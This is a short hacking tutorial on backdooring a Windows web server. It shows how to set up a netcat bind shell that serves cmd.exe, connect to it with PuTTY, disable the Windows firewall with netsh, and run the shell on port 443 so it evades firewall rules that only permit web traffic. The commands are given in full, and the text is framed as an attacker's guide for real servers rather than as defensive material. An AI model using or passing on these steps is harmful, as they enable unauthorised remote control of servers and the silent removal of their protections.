Tutorial | Bypassing Firewall on a Web Server

 

Tutorial | Bypassing Firewall on a Web Server ********************************************* *************** The key point of this paper is to discuss how to backdoor a windows test server and bypass its’ firewall. So this is a few steps to bypass firewall easily: Tools: 1. Netcat link:- http://netcat.sourceforge.net/download.php 2. Windows operating system 3. Putty telnet and ssh client for windows link:- http://www.putty.org/ For those who don’t know how to make netcat backdoor, must read this. If you’re just interested to bypassing firewall skip it. Very first I will show you to make a backdoor using net cat: Upload netcat on remote pc and making a listening port. For example. C:\>nc –l –p 8080 [on 192.168.9.2] So here we are making 8080 as the listening port. The next step is to connect 192.168.9.2 through remote system. For that we need to install netcat on 192.168.9.2 and execute cmd prompt. So here is the command we need to run on 192.168.9.2 C:\>nc –l –p 8080 –e cmd.exe you can use putty to connect Just type the address 192.168.9.2 and specify the port no. 8080 Once u connect u will get the command prompt this way u can make a backdoor connect on win server. After getting the command prompt u can disable firewall if required by command line C:\>netsh firewall set opmode disable Or Use C:\Windows\System32\netsh.exe “firewall set opmode = DISABLE profile = ALL” when it comes to real scenario – most of the web servers block rdp connection in the sense they block inbound traffic on port no. 3389 [IIS Webserver]————-[=Firewall=]————-attacker So the firewall rules will be Allow traffic on 80, 443. Deny all * exception on 80 and 443* So when we try to make rdp connection from external network it fails. There are few methods where we can trick the firewall by running netcat on 443 or anyother open port on server. We just need to run netcat on 443 because the firewall allows 443 traffic.